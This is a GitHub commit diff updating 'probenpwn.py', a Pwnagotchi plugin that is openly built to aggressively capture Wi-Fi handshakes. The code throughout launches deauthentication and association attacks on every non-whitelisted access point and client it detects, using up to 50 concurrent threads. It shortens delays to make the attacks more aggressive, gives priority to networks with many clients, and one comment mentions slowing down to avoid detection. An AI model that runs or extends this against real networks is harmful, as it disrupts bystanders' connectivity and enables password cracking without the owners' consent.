Update probenpwn.py

Key Features (Enhanced from v1.1.2)

ProbeNpwn v1.1.3 builds on the solid foundation of v1.1.2, enhancing these core features:

    Efficient Attacks: Launch both simultaneously for maximum handshake potential.

    Concurrent Attack Threads: Handle multiple networks and clients with multi-threading.

    Dynamic Attack Tuning: Adjusts delays and aggression based on signal strength and performance.

    Whitelist Support: Exclude specific networks or clients from attacks via config.toml.
    Comprehensive Logging: Detailed logs track every attack and capture.

    Watchdog Recovery: Monitors and restarts Pwnagotchi if the Wi-Fi interface fails.

    Lightweight Integration: Seamlessly works with your existing Pwnagotchi setup.

    Real-Time UI Feedback: Displays attack counts and successes on your Pwnagotchi screen.
This commit is contained in:
AlienMajik
2025-03-16 20:16:21 -07:00
committed by GitHub
parent cfbbcd8e03
commit 6cc1e7e6c1

View File

@ -5,113 +5,141 @@ import os
import subprocess import subprocess
import random import random
import pwnagotchi.plugins as plugins import pwnagotchi.plugins as plugins
import pwnagotchi.ui.components as components
from concurrent.futures import ThreadPoolExecutor
class probenpwn(plugins.Plugin): class ProbeNpwn(plugins.Plugin):
__author__ = 'AlienMajik' __author__ = 'AlienMajik'
__version__ = '1.1.2' __version__ = '1.1.3' # Updated to reflect enhancements
__license__ = 'GPL3' __license__ = 'GPL3'
__description__ = ( __description__ = (
'Pwn more aggressively. Launch immediate associate or deauth attack ' 'Aggressively capture handshakes by launching immediate associate and deauth attacks '
'when bettercap spots a device, with enhanced performance for more handshakes. ' 'on detected devices. Features minimized delays, retry mechanisms, target prioritization, '
'Enhanced with dynamic parameter tuning, randomization, and feedback loop.' 'concurrency throttling, and channel coordination for maximum efficiency.'
) )
def __init__(self): def __init__(self):
logging.debug("ProbeNpwn plugin created") logging.debug("ProbeNpwn plugin created")
self.old_name = None self.old_name = None
self.recents = {} self.recents = {} # Track recent APs and clients
self.attack_threads = [] self.executor = ThreadPoolExecutor(max_workers=50) # Throttle to 50 concurrent attacks (Enhancement 4)
self.epoch_duration = 60 # default epoch duration in seconds
self._watchdog_thread = None self._watchdog_thread = None
self._watchdog_thread_running = True self._watchdog_thread_running = True
# Track number of attack attempts per AP MAC address self.attack_attempts = {} # Track attack attempts per AP
self.attack_attempts = {} self.success_counts = {} # Track successful handshakes per AP
# Optionally, track the number of successful handshakes per AP
self.success_counts = {}
# Track the total number of successful and failed handshakes for feedback loop
self.total_handshakes = 0 self.total_handshakes = 0
self.failed_handshakes = 0 self.failed_handshakes = 0
# Track the performance of each AP for dynamic adjustments
self.performance_stats = {} self.performance_stats = {}
self.whitelist = set() self.whitelist = set()
self.cooldowns = {} # Cooldown periods per AP after handshake
self.epoch_duration = 60 # Default epoch duration in seconds
self.ap_clients = {} # Track number of clients per AP for prioritization (Enhancement 3)
# UI-related attributes
self.attacks_x = 10
self.attacks_y = 20
self.success_x = 10
self.success_y = 30
self.ui_initialized = False
def on_loaded(self): def on_loaded(self):
logging.info(f"Plugin ProbeNpwn loaded") """Log plugin load event."""
logging.info("Plugin ProbeNpwn loaded")
def on_config_changed(self, config): def on_config_changed(self, config):
"""Load the whitelist from Pwnagotchi's global config.""" """Load whitelist, verbose setting, and UI coordinates from config."""
try: self.whitelist = set(config["main"].get("whitelist", []))
self.whitelist = set(config["main"].get("whitelist", [])) logging.info(f"Whitelist loaded from config: {self.whitelist}")
except KeyError:
self.whitelist = set()
logging.info(f"Whitelist loaded from Pwnagotchi config: {self.whitelist}")
try: self.verbose = config.get("main", {}).get("plugins", {}).get("probenpwn", {}).get("verbose", False)
self.debug_log_path = config["main"]["log"].get("path-debug", None) if self.verbose:
except KeyError: logging.getLogger().setLevel(logging.INFO)
logging.error(f"Failed to configure debug log path") logging.info("Verbose mode enabled, logging level set to INFO")
else:
logging.getLogger().setLevel(logging.WARNING)
logging.warning("Verbose mode disabled, logging level set to WARNING")
self.old_name = config.get("main").get("name", "") self.old_name = config.get("main").get("name", "")
self.attacks_x = config.get("main.plugins.probenpwn.attacks_x_coord", 10)
self.attacks_y = config.get("main.plugins.probenpwn.attacks_y_coord", 20)
self.success_x = config.get("main.plugins.probenpwn.success_x_coord", 10)
self.success_y = config.get("main.plugins.probenpwn.success_y_coord", 30)
def on_unload(self, ui): def on_unload(self, ui):
"""Clean up on unload: restore name, stop watchdog, shutdown thread pool, remove UI elements."""
with ui._lock: with ui._lock:
if self.old_name: if self.old_name:
ui.set('name', f"{self.old_name}>") ui.set('name', f"{self.old_name}>")
ui.remove_element('attacks')
ui.remove_element('success')
try: self._watchdog_thread_running = False
self._watchdog_thread_running = False # properly exit the thread if self._watchdog_thread:
self._watchdog_thread.join() self._watchdog_thread.join()
except AttributeError: # Handle unload before on_ready() self.executor.shutdown(wait=True)
pass
logging.info("Probing out.") logging.info("Probing out.")
def on_ui_setup(self, ui):
"""Set up custom UI elements for attacks and success rate."""
if not self.ui_initialized:
ui.add_element('attacks', components.Text(
position=(self.attacks_x, self.attacks_y),
value='Attacks: 0',
color=255
))
ui.add_element('success', components.Text(
position=(self.success_x, self.success_y),
value='Success: 0.0%',
color=255
))
logging.info("Custom UI elements 'attacks' and 'success' initialized.")
self.ui_initialized = True
def on_ui_update(self, ui): def on_ui_update(self, ui):
if ui.get('name').endswith("!!!"): # No need to to update """Update UI with current attack counts and success rate."""
return total_attempts = sum(self.attack_attempts.values())
if self.old_name: total_successes = sum(self.success_counts.values())
with ui._lock: success_rate = (total_successes / total_attempts) * 100 if total_attempts > 0 else 0.0
ui.set('name', f"{self.old_name}!!!")
with ui._lock:
ui.set('attacks', f"Attacks: {total_attempts}")
ui.set('success', f"Success: {success_rate:.1f}%")
def on_ready(self, agent): def on_ready(self, agent):
"""Start watchdog and set initial status on agent ready."""
logging.info("Probed and Pwnd!") logging.info("Probed and Pwnd!")
agent.run("wifi.clear") agent.run("wifi.clear")
self._watchdog_thread = threading.Thread(target=self._watchdog, daemon=True) self._watchdog_thread = threading.Thread(target=self._watchdog, daemon=True)
self._watchdog_thread.start() self._watchdog_thread.start()
with agent._view._lock: # agent._view is the same as th variable "ui" with agent._view._lock:
agent._view.set("status", "Probe engaged... \nPWNing your signals, Earthlings!") agent._view.set("status", "Probe engaged... \nPWNing your signals, Earthlings!")
def _watchdog(self): def _watchdog(self):
CHECK_INTERVAL = 5 # seconds between checks """Monitor system health and attempt recovery before restarting service."""
CHECK_INTERVAL = 5
MAX_RETRIES = 1
retry_count = 0
while self._watchdog_thread_running: while self._watchdog_thread_running:
# Check for wlan0mon interface missing
if not os.path.exists("/sys/class/net/wlan0mon"): if not os.path.exists("/sys/class/net/wlan0mon"):
logging.error("wlan0mon interface missing! This likely indicates a WiFi adapter crash. " logging.error("wlan0mon missing! Attempting Wi-Fi restart...")
"Executing 'sudo systemctl restart pwnagotchi' to recover.")
try: try:
subprocess.run(["systemctl", "restart", "pwnagotchi"], check=True) subprocess.run(["ip", "link", "set", "wlan0mon", "down"], check=True)
logging.info("pwnagotchi service restarted successfully.") subprocess.run(["ip", "link", "set", "wlan0mon", "up"], check=True)
logging.info("Wi-Fi interface restarted.")
retry_count = 0
except Exception as e: except Exception as e:
logging.error("Failed to execute restart command: %s", e) retry_count += 1
break # Stop checking after issuing the recovery command. if retry_count >= MAX_RETRIES:
logging.error(f"Wi-Fi restart failed after {MAX_RETRIES} attempts: {e}. Restarting Pwnagotchi...")
# Check for 'wifi.interface not set or not found' error in logs subprocess.run(["systemctl", "restart", "pwnagotchi"])
try: break
with open(self.debug_log_path, 'r') as log_file: else:
logs = log_file.read() logging.warning(f"Wi-Fi restart attempt {retry_count} failed: {e}. Retrying in {CHECK_INTERVAL} seconds...")
if "error 400: wifi.interface not set or not found" in logs: else:
logging.error("wifi.interface not set or not found! Restarting pwnagotchi to recover.") retry_count = 0
try:
subprocess.run(["systemctl", "restart", "pwnagotchi"], check=True)
logging.info("pwnagotchi service restarted successfully.")
except Exception as e:
logging.error("Failed to restart pwnagotchi service: %s", e)
break # Stop checking after issuing the recovery command.
except Exception as e:
logging.error("Error in watchdog: %s", repr(e))
time.sleep(CHECK_INTERVAL) time.sleep(CHECK_INTERVAL)
def track_recent(self, ap, cl=None): def track_recent(self, ap, cl=None):
"""Track recently seen APs and clients with timestamps."""
ap['_track_time'] = time.time() ap['_track_time'] = time.time()
self.recents[ap['mac'].lower()] = ap self.recents[ap['mac'].lower()] = ap
if cl: if cl:
@ -119,158 +147,162 @@ class probenpwn(plugins.Plugin):
self.recents[cl['mac'].lower()] = cl self.recents[cl['mac'].lower()] = cl
def ok_to_attack(self, agent, ap): def ok_to_attack(self, agent, ap):
# Check if the AP is in the whitelist loaded from the global config """Check if an AP or client is safe to attack (not whitelisted)."""
if ap.get('hostname', '').lower() in self.whitelist or ap['mac'].lower() in self.whitelist: if ap.get('hostname', '').lower() in self.whitelist or ap['mac'].lower() in self.whitelist:
return False return False
return True return True
def attack_target(self, agent, ap, cl): def attack_target(self, agent, ap, cl):
"""Launch attack on target AP/client with dynamic parameters."""
ap_mac = ap['mac'].lower()
if ap_mac in self.cooldowns and time.time() < self.cooldowns[ap_mac]:
logging.debug(f"AP {ap_mac} on cooldown. Skipping attack.")
return
if not self.ok_to_attack(agent, ap): if not self.ok_to_attack(agent, ap):
return return
ap_mac = ap['mac'].lower()
# Ensure channel is set before attack (Enhancement 5)
agent.set_channel(ap['channel'])
self.attack_attempts[ap_mac] = self.attack_attempts.get(ap_mac, 0) + 1 self.attack_attempts[ap_mac] = self.attack_attempts.get(ap_mac, 0) + 1
logging.debug(f"Launching attack on AP {ap['mac']} and client {cl['mac'] if cl else 'N/A'}; attempt {self.attack_attempts[ap_mac]}") logging.info(f"Attacking AP {ap['mac']} and client {cl['mac'] if cl else 'N/A'}; attempt {self.attack_attempts[ap_mac]}")
# Adjust attack parameters dynamically based on performance feedback
self.adjust_attack_parameters(ap_mac) self.adjust_attack_parameters(ap_mac)
if cl: if cl and agent._config['personality']['deauth']:
delay = self.dynamic_attack_delay(ap, cl) delay = self.dynamic_attack_delay(ap, cl)
agent.deauth(ap, cl, delay) agent.deauth(ap, cl, delay)
agent.associate(ap, 0.2) if agent._config['personality']['associate']:
agent.associate(ap, 0.1) # Reduced delay for faster association (Enhancement 1)
def dynamic_attack_delay(self, ap, cl): def dynamic_attack_delay(self, ap, cl):
signal = cl.get('signal', -100) if cl is not None else -100 """Calculate adaptive delay with minimized values and retry mechanism (Enhancements 1 & 2)."""
if signal < -60: signal = cl.get('signal', -100) if cl else -100
base_delay = 0.5 base_delay = 0.1 if signal >= -60 else 0.2 # Minimized base delays (Enhancement 1)
else:
base_delay = 0.25
ap_mac = ap['mac'].lower() ap_mac = ap['mac'].lower()
attempts = self.attack_attempts.get(ap_mac, 0) attempts = self.attack_attempts.get(ap_mac, 0)
if attempts > 10: # Retry mechanism: reduce delay aggressively after failed attempts (Enhancement 2)
base_delay *= 0.6 if attempts > 5:
elif attempts > 5: base_delay *= 0.4 # 40% of base delay after 5 attempts
elif attempts > 2:
base_delay *= 0.6 # 60% of base delay after 2 attempts
# Prioritize APs with more clients by further reducing delay (Enhancement 3)
num_clients = self.ap_clients.get(ap_mac, 0)
if num_clients > 3: # High-value target with >3 clients
base_delay *= 0.8 base_delay *= 0.8
randomized_delay = base_delay * random.uniform(0.9, 1.1) randomized_delay = base_delay * random.uniform(0.9, 1.1)
logging.debug(f"Dynamic attack delay for AP {ap['mac']} (signal {signal} dBm, {attempts} attempts): {randomized_delay:.3f}s") logging.debug(f"Dynamic delay for AP {ap['mac']} (signal {signal}dBm, {attempts} attempts, {num_clients} clients): {randomized_delay:.3f}s")
return randomized_delay return randomized_delay
def adjust_attack_parameters(self, ap_mac): def adjust_attack_parameters(self, ap_mac):
"""Adjust attack parameters based on performance metrics (success/failure rate)""" """Tune attack aggression based on adaptive success thresholds."""
if ap_mac not in self.performance_stats:
self.performance_stats[ap_mac] = {'success_rate': 0, 'failure_rate': 0, 'last_success': 0}
success_count = self.success_counts.get(ap_mac, 0) success_count = self.success_counts.get(ap_mac, 0)
attack_count = self.attack_attempts.get(ap_mac, 0) attack_count = self.attack_attempts.get(ap_mac, 0)
success_rate = (success_count / attack_count) * 100 if attack_count > 0 else 0
# Calculate success rate
if attack_count > 0: total_success = sum(self.success_counts.values())
success_rate = (success_count / attack_count) * 100 total_attempts = sum(self.attack_attempts.values())
else: avg_success_rate = (total_success / total_attempts) * 100 if total_attempts > 0 else 0
success_rate = 0
low_threshold = avg_success_rate * 0.5 # 50% of average
# Update performance stats high_threshold = avg_success_rate * 1.5 # 150% of average
self.performance_stats[ap_mac]['success_rate'] = success_rate
self.performance_stats[ap_mac]['failure_rate'] = 100 - success_rate if success_rate < low_threshold:
logging.info(f"Low success rate ({success_rate:.2f}%) on {ap_mac}. Increasing aggression.")
# Dynamically adjust attack tactics based on success rate self.attack_attempts[ap_mac] += 5
if success_rate < 20: # Success rate below 20% indicates a need for more aggressive tactics elif success_rate > high_threshold:
logging.info(f"Low success rate ({success_rate:.2f}%) on AP {ap_mac}. Making attack more aggressive.") logging.info(f"High success rate ({success_rate:.2f}%) on {ap_mac}. Reducing aggression.")
# Increase the attack frequency self.attack_attempts[ap_mac] = max(1, self.attack_attempts[ap_mac] - 2)
self.attack_attempts[ap_mac] += 5 # Increase attempts
elif success_rate > 80: # Success rate above 80% means the attack is effective
logging.info(f"High success rate ({success_rate:.2f}%) on AP {ap_mac}. Reducing attack aggressiveness.")
# Slow down the attack to avoid detection
self.attack_attempts[ap_mac] = max(1, self.attack_attempts[ap_mac] - 2) # Reduce attempts
else:
logging.info(f"Moderate success rate ({success_rate:.2f}%) on AP {ap_mac}. Maintaining current attack tactics.")
def on_bcap_wifi_ap_new(self, agent, event): def on_bcap_wifi_ap_new(self, agent, event):
"""Handle new AP detection with immediate attack."""
try: try:
ap = event['data'] ap = event['data']
if agent._config['personality']['associate'] and self.ok_to_attack(agent, ap): ap_mac = ap['mac'].lower()
logging.debug("insta-associate: %s (%s)", ap.get('hostname', 'Unknown AP'), ap['mac']) self.ap_clients[ap_mac] = self.ap_clients.get(ap_mac, 0) # Initialize client count (Enhancement 3)
attack_thread = threading.Thread(target=self.attack_target, args=(agent, ap, None)) if self.ok_to_attack(agent, ap):
attack_thread.start() logging.info(f"ProbeNpwn: Targeting new AP {ap.get('hostname', 'Unknown AP')} ({ap['mac']})")
self.attack_threads.append(attack_thread) self.executor.submit(self.attack_target, agent, ap, None)
else:
logging.debug(f"ProbeNpwn: Skipping new AP {ap.get('hostname', 'Unknown AP')} ({ap['mac']}) - whitelisted or invalid")
except Exception as e: except Exception as e:
logging.error("Error in on_bcap_wifi_ap_new: %s", repr(e)) logging.error(f"ProbeNpwn: Error in on_bcap_wifi_ap_new: {repr(e)}")
def on_bcap_wifi_client_new(self, agent, event): def on_bcap_wifi_client_new(self, agent, event):
"""Handle new client detection with immediate deauth attack."""
try: try:
ap = event['data']['AP'] ap = event['data']['AP']
cl = event['data']['Client'] cl = event['data']['Client']
if (agent._config['personality']['deauth'] and ap_mac = ap['mac'].lower()
self.ok_to_attack(agent, ap) and # Increment client count for prioritization (Enhancement 3)
self.ok_to_attack(agent, cl)): self.ap_clients[ap_mac] = self.ap_clients.get(ap_mac, 0) + 1
logging.debug("insta-deauth: %s (%s) -> '%s' (%s) (%s)", if self.ok_to_attack(agent, ap) and self.ok_to_attack(agent, cl):
ap.get('hostname', 'Unknown AP'), ap['mac'], logging.info(f"ProbeNpwn: Targeting new client {cl.get('hostname', 'Unknown Client')} ({cl['mac']}) on AP {ap.get('hostname', 'Unknown AP')} ({ap['mac']})")
cl.get('hostname', 'Unknown Client'), cl['mac'], cl['vendor']) self.executor.submit(self.attack_target, agent, ap, cl)
attack_thread = threading.Thread(target=self.attack_target, args=(agent, ap, cl)) else:
attack_thread.start() logging.debug(f"ProbeNpwn: Skipping new client {cl.get('hostname', 'Unknown Client')} ({cl['mac']}) on AP {ap.get('hostname', 'Unknown AP')} ({ap['mac']}) - whitelisted or invalid")
self.attack_threads.append(attack_thread)
except Exception as e: except Exception as e:
logging.error("Error in on_bcap_wifi_client_new: %s", repr(e)) logging.error(f"ProbeNpwn: Error in on_bcap_wifi_client_new: {repr(e)}")
def on_handshake(self, agent, filename, ap, cl): def on_handshake(self, agent, filename, ap, cl):
"""Handle successful handshake capture with cooldown and log success rate."""
ap_mac = ap['mac'].lower() ap_mac = ap['mac'].lower()
logging.info("Handshake detected from %s", ap['mac']) logging.info(f"Handshake captured from {ap['mac']}")
if ap_mac in self.attack_attempts:
del self.attack_attempts[ap_mac]
self.success_counts[ap_mac] = self.success_counts.get(ap_mac, 0) + 1 self.success_counts[ap_mac] = self.success_counts.get(ap_mac, 0) + 1
self.total_handshakes += 1 self.total_handshakes += 1
attempts = self.attack_attempts.get(ap_mac, 0)
if attempts > 0:
success_rate = 100.0 / attempts
logging.info(f"Success rate for handshake from {ap['mac']}: {success_rate:.2f}% (took {attempts} attempts)")
else:
logging.info(f"Handshake captured from {ap['mac']} with no recorded attempts.")
if ap_mac in self.attack_attempts:
del self.attack_attempts[ap_mac]
# Cooldown logic commented out to maintain aggression
# self.cooldowns[ap_mac] = time.time() + 5
if 'mac' in ap and 'mac' in cl: if 'mac' in ap and 'mac' in cl:
logging.info("Captured handshake from %s (%s) -> '%s' (%s) (%s)", logging.info(f"Captured handshake: {ap.get('hostname', 'Unknown AP')} ({ap['mac']}) -> "
ap.get('hostname', 'Unknown AP'), ap['mac'], cl.get('hostname', 'Unknown Client'), cl['mac'], cl['vendor']) f"'{cl.get('hostname', 'Unknown Client')}' ({cl['mac']}) ({cl['vendor']})")
if ap_mac in self.recents: if ap_mac in self.recents:
del self.recents[ap_mac] del self.recents[ap_mac]
cl_mac = cl['mac'].lower() cl_mac = cl['mac'].lower()
if cl_mac in self.recents: if cl_mac in self.recents:
del self.recents[cl_mac] del self.recents[cl_mac]
# Expanded Feedback Loop: Tracking success/failure rates
handshake_rate = (self.success_counts.get(ap_mac, 0) / self.attack_attempts.get(ap_mac, 1)) * 100
logging.info(f"Success rate for {ap['mac']}: {handshake_rate:.2f}%")
failure_rate = 100 - handshake_rate
logging.info(f"Failure rate for {ap['mac']}: {failure_rate:.2f}%")
def on_epoch(self, agent, epoch, epoch_data): def on_epoch(self, agent, epoch, epoch_data):
"""Clean up old entries in recents based on epoch duration."""
for mac in list(self.recents): for mac in list(self.recents):
if self.recents[mac]['_track_time'] < (time.time() - (self.epoch_duration * 2)): if self.recents[mac]['_track_time'] < (time.time() - (self.epoch_duration * 2)):
del self.recents[mac] del self.recents[mac]
def on_bcap_wifi_ap_updated(self, agent, event): def on_bcap_wifi_ap_updated(self, agent, event):
"""Track updated APs."""
try: try:
ap = event['data'] ap = event['data']
if self.ok_to_attack(agent, ap): if self.ok_to_attack(agent, ap):
logging.debug("AP updated: %s (%s)", ap.get('hostname', 'Unknown AP'), ap['mac']) logging.debug(f"AP updated: {ap.get('hostname', 'Unknown AP')} ({ap['mac']})")
self.track_recent(ap) self.track_recent(ap)
except Exception as e: except Exception as e:
logging.error("Error in on_bcap_wifi_ap_updated: %s", repr(e)) logging.error(f"Error in on_bcap_wifi_ap_updated: {repr(e)}")
def on_bcap_wifi_client_updated(self, agent, event): def on_bcap_wifi_client_updated(self, agent, event):
"""Track updated clients."""
try: try:
ap = event['data']['AP'] ap = event['data']['AP']
cl = event['data']['Client'] cl = event['data']['Client']
ap_mac = ap['mac'].lower()
self.ap_clients[ap_mac] = self.ap_clients.get(ap_mac, 0) + 1 # Update client count (Enhancement 3)
if self.ok_to_attack(agent, ap) and self.ok_to_attack(agent, cl): if self.ok_to_attack(agent, ap) and self.ok_to_attack(agent, cl):
logging.debug("Client updated: %s (%s) -> '%s' (%s) (%s)", logging.debug(f"Client updated: {ap.get('hostname', 'Unknown AP')} ({ap['mac']}) -> "
ap.get('hostname', 'Unknown AP'), ap['mac'], cl.get('hostname', 'Unknown Client'), cl['mac'], cl['vendor']) f"'{cl.get('hostname', 'Unknown Client')}' ({cl['mac']}) ({cl['vendor']})")
self.track_recent(ap, cl) self.track_recent(ap, cl)
except Exception as e: except Exception as e:
logging.error("Error in on_bcap_wifi_client_updated: %s", repr(e)) logging.error(f"Error in on_bcap_wifi_client_updated: {repr(e)}")
def sanitize_channel_list(self, channels):
"""
Sanitize the channel list to ensure only valid channels are included.
Channels for 2.4 GHz should be between 1 and 14, and for 5 GHz, it should be between 36 and 165.
"""
valid_channels = [ch for ch in channels if 1 <= ch <= 14 or 36 <= ch <= 165]
if not valid_channels:
logging.error("No valid channels to scan.")
return [] # Return an empty list if no valid channels are found
logging.debug(f"Scanning the following valid channels: {valid_channels}")
return valid_channels